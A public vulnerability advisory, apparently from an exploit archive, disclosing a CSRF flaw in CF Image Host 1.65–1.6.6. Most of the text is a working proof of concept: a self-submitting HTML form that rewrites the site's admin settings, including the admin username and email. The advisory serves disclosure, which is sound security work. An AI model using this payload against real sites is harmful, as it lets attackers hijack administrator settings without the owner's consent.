142 lines
No EOL
4.4 KiB
HTML
142 lines
No EOL
4.4 KiB
HTML
<!--
|
|
[+] Credits: hyp3rlinx
|
|
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
|
|
[+] Source:
|
|
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
|
|
|
|
|
|
Vendor:
|
|
====================================
|
|
codefuture.co.uk/projects/imagehost
|
|
|
|
|
|
Product:
|
|
===================================
|
|
CF Image Host 1.65 - 1.6.6
|
|
|
|
Archive download listed as: version 1.65
|
|
unzips as imagehost 1.6.6
|
|
|
|
|
|
Vulnerability Type:
|
|
=================================
|
|
Cross site request forgery - CSRF
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
N/A
|
|
|
|
|
|
Vulnerability Details:
|
|
=====================
|
|
|
|
No CSRF protection exists allowing attackers to make requests to the server
|
|
on behalf of the victim if they are logged in and visit a malicious site or
|
|
click
|
|
an infected linx. This will let attackers modify certain web application
|
|
settings to
|
|
whatever the attacker wishes.
|
|
|
|
|
|
CSRF Exploit code(s):
|
|
====================
|
|
-->
|
|
|
|
<form id='HELL' method="POST" action="
|
|
http://localhost/imagehost1.6.6/admin.php?act=set">
|
|
<input type="text" name="setScriptUrl" value="
|
|
http://hyp3rlinx.altervista.org" />
|
|
<input type="text" name="setTitle" value="ghostofsin" />
|
|
<input type="text" name="setSlogan" value="666" />
|
|
<input type="text" name="setCopyright" value="hyp3rlinx" />
|
|
<input type="text" name="setTheme" value="day" />
|
|
<input type="text" name="setModeRewrite" value="0" />
|
|
<input type="text" name="setAddThis" value="0" />
|
|
<input type="text" name="setLanguage" value="0" />
|
|
<input type="text" name="changesettings" value="Save+Changes" />
|
|
<input type="text" name="setModeRewrite" value="0" />
|
|
<input type="text" name="setAllowReport" value="1" />
|
|
<input type="text" name="setEmailReport" value="1" />
|
|
<input type="text" name="setHideGallery" value="1" />
|
|
<input type="text" name="setHideContact" value="1" />
|
|
<input type="text" name="setHideTos" value="1" />
|
|
<input type="text" name="setHideFaq" value="1" />
|
|
<input type="text" name="setHideSearch" value="1" />
|
|
<input type="text" name="setImageWidgit" value="1" />
|
|
<input type="text" name="setHideFeed" value="1" />
|
|
<input type="text" name="setHideSitemap" value="1" />
|
|
<input type="text" name="setAutoDeleted" value="0" />
|
|
<input type="text" name="setAutoDeletedTime" value="10" />
|
|
<input type="text" name="setAutoDeletedJump" value="m" />
|
|
<input type="text" name="setDisUpload" value="0" />
|
|
<input type="text" name="setAutoDeleted" value="0" />
|
|
<input type="text" name="setMaxSize" value="1048576" />
|
|
<input type="text" name="setMaxBandwidth" value="1024" />
|
|
<input type="text" name="setBandwidthReset" value="m" />
|
|
<input type="text" name="setMaxUpload" value="5" />
|
|
<input type="text" name="setNoDuplicate" value="0" />
|
|
<input type="text" name="setResizeImg" value="1" />
|
|
<input type="text" name="setPrivateImg" value="1" />
|
|
<input type="text" name="setWaterMark" value="0" />
|
|
<input type="text" name="setWatermarkText" value="0" />
|
|
<input type="text" name="setWatermarkImage" value="1" />
|
|
<input type="text" name="setWatermarkPlaced" value="1" />
|
|
<input type="text" name="setSUrlApi" value="b54" />
|
|
<input type="text" name="setSUrlApiUrl" value="" />
|
|
<input type="text" name="setSUrlApiUesr" value="" />
|
|
<input type="text" name="setSUrlApiPass" value="" />
|
|
<input type="text" name="setAnalytics" value="" />
|
|
<input type="text" name="setGoogleCha" value="" />
|
|
<input type="text" name="setGoogleAds" value="" />
|
|
<input type="text" name="oldPassword" value="" />
|
|
<input type="text" name="newPassword" value="" />
|
|
<input type="text" name="newConfirm" value="" />
|
|
<input type="text" name="setUserName" value="admin" />
|
|
<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
|
|
<script>document.getElementById('HELL').submit()</script>
|
|
</form>
|
|
|
|
|
|
<!--
|
|
Disclosure Timeline:
|
|
=====================
|
|
Vendor Notification: NA
|
|
November 14, 2015 : Public Disclosure
|
|
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
================
|
|
High
|
|
|
|
|
|
Description:
|
|
============================================================
|
|
|
|
Request Method(s): [+] POST
|
|
|
|
|
|
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
Permission is hereby granted for the redistribution of this advisory,
|
|
provided that it is not altered except by reformatting it, and that due
|
|
credit is given. Permission is explicitly given for insertion in
|
|
vulnerability databases and similar, provided that due credit is given to
|
|
the author.
|
|
The author is not responsible for any misuse of the information contained
|
|
herein and prohibits any malicious use of all security related information
|
|
or exploits by the author or elsewhere.
|
|
|
|
by hyp3rlinx
|
|
--> |